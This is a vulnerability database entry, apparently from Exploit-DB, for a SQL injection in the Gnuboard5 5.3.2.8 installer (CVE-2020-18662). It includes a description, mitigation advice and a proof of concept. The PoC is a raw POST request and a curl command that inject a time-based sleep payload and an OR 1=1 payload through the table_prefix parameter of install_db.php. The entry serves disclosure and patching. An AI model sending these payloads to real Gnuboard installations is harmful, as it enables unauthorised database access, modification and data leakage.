Gnuboard5 5.3.2.8 - SQL Injection

vendor:

Gnuboard5

by:

CodeSecLab

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Gnuboard5

Affected Version From: 5.3.2.8

Affected Version To: 5.3.2.8

Patch Exists: NO

Related CWE: CVE-2020-18662

CPE: gnuboard5:5.3.2.8

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu, Windows

2024

Gnuboard5 5.3.2.8 – SQL Injection

The vulnerability in Gnuboard5 version 5.3.2.8 allows an attacker to execute arbitrary SQL queries through the 'mysql_user', 'mysql_pass', 'mysql_db', and 'table_prefix' parameters in the 'install_db.php' script, leading to unauthorized access to the database. This exploit utilizes SQL injection to manipulate the SQL queries, potentially resulting in data leakage, modification, or deletion. The CVE associated with this vulnerability is CVE-2020-18662.

Mitigation:

To mitigate this issue, sanitize and validate user inputs to prevent SQL injection attacks. Additionally, implement parameterized queries or use ORM frameworks that handle input sanitization.

Source

Exploit-DB raw data:

# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/gnuboard/gnuboard5
# Software Link: https://github.com/gnuboard/gnuboard5
# Version: 5.3.2.8
# Tested on: Ubuntu Windows
# CVE : CVE-2020-18662

PoC: 
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
  -d "mysql_user=root" \
  -d "mysql_pass=password" \
  -d "mysql_db=gnuboard_db" \
  -d "table_prefix=' OR 1=1--"
result: The application does not work.

[Replace Your Domain Name and Replace Database Information]